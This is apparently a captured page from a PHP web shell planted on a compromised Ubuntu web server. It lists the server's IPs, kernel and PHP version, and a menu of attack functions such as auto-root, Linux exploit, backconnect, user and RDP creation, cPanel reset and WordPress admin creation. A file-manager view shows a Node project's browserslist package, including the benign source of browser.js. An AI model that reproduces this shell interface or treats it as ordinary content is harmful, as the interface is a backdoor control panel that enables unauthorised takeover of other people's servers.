Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
browserslist /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
8.75
KB
-rw-r--r--
LICENSE
1.07
KB
-rw-r--r--
README.md
16.96
KB
-rw-r--r--
browser.js
902
B
-rw-r--r--
cli.js
3.59
KB
-rw-r--r--
error.js
300
B
-rw-r--r--
index.js
26.24
KB
-rw-r--r--
node.js
9.02
KB
-rw-r--r--
package.json
1.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : browser.js
var BrowserslistError = require('./error') function noop () { } module.exports = { loadQueries: function loadQueries () { throw new BrowserslistError( 'Sharable configs are not supported in client-side build of Browserslist') }, getStat: function getStat (opts) { return opts.stats }, loadConfig: function loadConfig (opts) { if (opts.config) { throw new BrowserslistError( 'Browserslist config are not supported in client-side build') } }, loadCountry: function loadCountry () { throw new BrowserslistError( 'Country statistics is not supported ' + 'in client-side build of Browserslist') }, currentNode: function currentNode (resolve, context) { return resolve(['maintained node versions'], context)[0] }, parseConfig: noop, readConfig: noop, findConfig: noop, clearCaches: noop, oldDataWarning: noop }
Close